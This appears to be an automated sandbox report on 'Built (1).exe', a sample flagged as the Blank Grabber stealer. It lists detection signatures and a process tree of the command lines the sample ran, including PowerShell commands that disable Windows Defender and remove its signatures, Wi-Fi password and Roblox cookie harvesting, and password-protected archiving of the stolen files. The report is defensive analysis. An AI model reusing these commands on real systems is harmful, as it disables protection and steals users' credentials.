Edit tour
Windows
Analysis Report
Built (1).exe
Overview
General Information
| Sample name: | Built (1).exe |
| Analysis ID: | 1442321 |
| MD5: | 95567cf5f31a7d7f34ae092e68f9999d |
| SHA1: | 5e0d1a179f0a14e9939e8056e46846bc7eadb2bf |
| SHA256: | a879fcea4ce6f6041ffc6271c261cf6fc09ec21ac118db277572ddf7b08e8708 |
| Tags: | BlankGrabberexe |
| Infos: |   |
 | |
Detection
Blank Grabber
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Blank Grabber
Yara detected Telegram RAT
Adds a directory exclusion to Windows Defender
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the hosts file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Classification
- System is w10x64
Built (1).exe (PID: 7528 cmdline: "C:\Users\ user\Deskt op\Built ( 1).exe" MD5: 95567CF5F31A7D7F34AE092E68F9999D) - Built (1).exe (PID: 7544 cmdline:
"C:\Users\ user\Deskt op\Built ( 1).exe" MD5: 95567CF5F31A7D7F34AE092E68F9999D) 
cmd.exe (PID: 7596 cmdline: C:\Windows \system32\ cmd.exe /c "powershe ll -Comman d Add-MpPr eference - ExclusionP ath 'C:\Us ers\user\D esktop\Bui lt (1).exe '" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7612 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 7680 cmdline: powershell -Command Add-MpPref erence -Ex clusionPat h 'C:\User s\user\Des ktop\Built (1).exe' MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 7604 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll Set-MpP reference -DisableIn trusionPre ventionSys tem $true -DisableIO AVProtecti on $true - DisableRea ltimeMonit oring $tru e -Disable ScriptScan ning $true -EnableCo ntrolledFo lderAccess Disabled -EnableNet workProtec tion Audit Mode -Forc e -MAPSRep orting Dis abled -Sub mitSamples Consent Ne verSend && powershel l Set-MpPr eference - SubmitSamp lesConsent 2 & "%Pro gramFiles% \Windows D efender\Mp CmdRun.exe " -RemoveD efinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7620 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7700 cmdline:
powershell Set-MpPre ference -D isableIntr usionPreve ntionSyste m $true -D isableIOAV Protection $true -Di sableRealt imeMonitor ing $true -DisableSc riptScanni ng $true - EnableCont rolledFold erAccess D isabled -E nableNetwo rkProtecti on AuditMo de -Force -MAPSRepor ting Disab led -Submi tSamplesCo nsent Neve rSend MD5: 04029E121A0CFA5991749937DD22A1D9) 
MpCmdRun.exe (PID: 7628 cmdline: "C:\Progra m Files\Wi ndows Defe nder\MpCmd Run.exe" - RemoveDefi nitions -A ll MD5: B3676839B2EE96983F9ED735CD044159) - cmd.exe (PID: 7692 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll -Comman d Add-MpPr eference - ExclusionP ath 'C:\Pr ogramData\ Microsoft\ Windows\St art Menu\P rograms\St artUp\ . scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7716 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7764 cmdline:
powershell -Command Add-MpPref erence -Ex clusionPat h 'C:\Prog ramData\Mi crosoft\Wi ndows\Star t Menu\Pro grams\Star tUp\ .sc r' MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 7948 cmdline:
C:\Windows \system32\ cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7988 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 8168 cmdline:
tasklist / FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 7964 cmdline:
C:\Windows \system32\ cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8024 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 6032 cmdline:
tasklist / FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - conhost.exe (PID: 8004 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 8088 cmdline:
C:\Windows \system32\ cmd.exe /c "WMIC /No de:localho st /Namesp ace:\\root \SecurityC enter2 Pat h Antiviru sProduct G et display Name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8136 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
WMIC.exe (PID: 4192 cmdline: WMIC /Node :localhost /Namespac e:\\root\S ecurityCen ter2 Path AntivirusP roduct Get displayNa me MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - cmd.exe (PID: 8104 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll Get-Cli pboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8184 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5264 cmdline:
powershell Get-Clipb oard MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 8128 cmdline:
C:\Windows \system32\ cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7576 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 7252 cmdline:
tasklist / FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 8160 cmdline:
C:\Windows \system32\ cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7720 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tree.com (PID: 7296 cmdline:
tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0) - cmd.exe (PID: 8204 cmdline:
C:\Windows \system32\ cmd.exe /c "netsh wl an show pr ofile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8212 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - netsh.exe (PID: 8256 cmdline:
netsh wlan show prof ile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB) - cmd.exe (PID: 8316 cmdline:
C:\Windows \system32\ cmd.exe /c "systemin fo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8332 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - systeminfo.exe (PID: 8400 cmdline:
systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD) - cmd.exe (PID: 8384 cmdline:
C:\Windows \system32\ cmd.exe /c "REG QUER Y HKEY_LOC AL_MACHINE \SYSTEM\Cu rrentContr olSet\Serv ices\Tcpip \Parameter s /V DataB asePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8460 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - reg.exe (PID: 8580 cmdline:
REG QUERY HKEY_LOCAL _MACHINE\S YSTEM\Curr entControl Set\Servic es\Tcpip\P arameters /V DataBas ePath MD5: 227F63E1D9008B36BDBCC4B397780BE4) - cmd.exe (PID: 8392 cmdline:
C:\Windows \system32\ cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8468 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tree.com (PID: 8548 cmdline:
tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0) - cmd.exe (PID: 8656 cmdline:
C:\Windows \system32\ cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8680 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tree.com (PID: 8788 cmdline:
tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0) - cmd.exe (PID: 8696 cmdline:
C:\Windows \system32\ cmd.exe /c "attrib - r C:\Windo ws\System3 2\drivers\ etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8756 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - attrib.exe (PID: 8852 cmdline:
attrib -r C:\Windows \System32\ drivers\et c\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD) - cmd.exe (PID: 8704 cmdline:
C:\Windows \system32\ cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8720 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - getmac.exe (PID: 8836 cmdline:
getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33) - cmd.exe (PID: 8884 cmdline:
C:\Windows \system32\ cmd.exe /c "attrib + r C:\Windo ws\System3 2\drivers\ etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8900 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - attrib.exe (PID: 8976 cmdline:
attrib +r C:\Windows \System32\ drivers\et c\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD) - cmd.exe (PID: 8928 cmdline:
C:\Windows \system32\ cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8952 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tree.com (PID: 8996 cmdline:
tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0) - cmd.exe (PID: 9020 cmdline:
C:\Windows \system32\ cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 9036 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 9084 cmdline:
tasklist / FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 9064 cmdline:
C:\Windows \system32\ cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 9096 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tree.com (PID: 9152 cmdline:
tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0) - cmd.exe (PID: 9168 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll Get-Ite mPropertyV alue -Path HKCU:SOFT WARE\Roblo x\RobloxSt udioBrowse r\roblox.c om -Name . ROBLOSECUR ITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 9180 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7280 cmdline:
powershell Get-ItemP ropertyVal ue -Path H KCU:SOFTWA RE\Roblox\ RobloxStud ioBrowser\ roblox.com -Name .RO BLOSECURIT Y MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 7272 cmdline:
C:\Windows \system32\ cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8056 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tree.com (PID: 8212 cmdline:
tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0) - cmd.exe (PID: 3632 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll Get-Ite mPropertyV alue -Path HKLM:SOFT WARE\Roblo x\RobloxSt udioBrowse r\roblox.c om -Name . ROBLOSECUR ITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7512 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5284 cmdline:
powershell Get-ItemP ropertyVal ue -Path H KLM:SOFTWA RE\Roblox\ RobloxStud ioBrowser\ roblox.com -Name .RO BLOSECURIT Y MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 1228 cmdline:
C:\Windows \system32\ cmd.exe /c "C:\Users \user\AppD ata\Local\ Temp\_MEI7 5282\rar.e xe a -r -h p"123" "C: \Users\use r\AppData\ Local\Temp \R4aMj.zip " *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8144 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - rar.exe (PID: 8204 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\_MEI752 82\rar.exe a -r -hp" 123" "C:\U sers\user\ AppData\Lo cal\Temp\R 4aMj.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E) - cmd.exe (PID: 8468 cmdline:
C:\Windows \system32\ cmd.exe /c "wmic os get Captio n" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8536 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 7856 cmdline:
wmic os ge t Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - cmd.exe (PID: 7924 cmdline:
C:\Windows \system32\ cmd.exe /c "wmic com putersyste m get tota lphysicalm emory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8252 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 8320 cmdline:
wmic compu tersystem get totalp hysicalmem ory MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - cmd.exe (PID: 8612 cmdline:
C:\Windows \system32\ cmd.exe /c "wmic csp roduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8316 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 8868 cmdline:
wmic cspro duct get u uid MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - cmd.exe (PID: 8784 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll Get-Ite mPropertyV alue -Path 'HKLM:Sys tem\Curren tControlSe t\Control\ Session Ma nager\Envi ronment' - Name PROCE SSOR_IDENT IFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8800 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 8748 cmdline:
powershell Get-ItemP ropertyVal ue -Path ' HKLM:Syste m\CurrentC ontrolSet\ Control\Se ssion Mana ger\Enviro nment' -Na me PROCESS OR_IDENTIF IER MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 8884 cmdline:
C:\Windows \system32\ cmd.exe /c "wmic pat h win32_Vi deoControl ler get na me" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8908 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 8880 cmdline:
wmic path win32_Vide oControlle r get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - cmd.exe (PID: 8948 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll Get-Ite mPropertyV alue -Path 'HKLM:SOF TWARE\Micr osoft\Wind ows NT\Cur rentVersio n\Software Protection Platform' -Name Back upProductK eyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8972 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1360 cmdline:
powershell Get-ItemP ropertyVal ue -Path ' HKLM:SOFTW ARE\Micros oft\Window s NT\Curre ntVersion\ SoftwarePr otectionPl atform' -N ame Backup ProductKey Default MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security | ||
| JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security | ||
| JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security | ||
| JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security | ||
| JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security | ||
| Click to see the 8 entries | ||||
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: @ROxPinTeddy: | ||
| Source: | Author: Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: | ||
| Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): | ||
| Source: | Author: frack113: | ||
| Source: | Author: Timur Zinniatullin, E.M. Anhaus, oscd.community: | ||
| Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): | ||
Stealing of Sensitive Information | |
|---|
| Source: | Author: Joe Security: | ||
⊘No Snort rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection | |
|---|
| Source: | Avira: | ||
| Source: | URL Reputation: | ||
| Source: | ReversingLabs: | ||
| Source: | Joe Sandbox ML: | ||
| Source: | Code function: | 74_2_00007FF70F38901C | |
| Source: | Static PE information: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||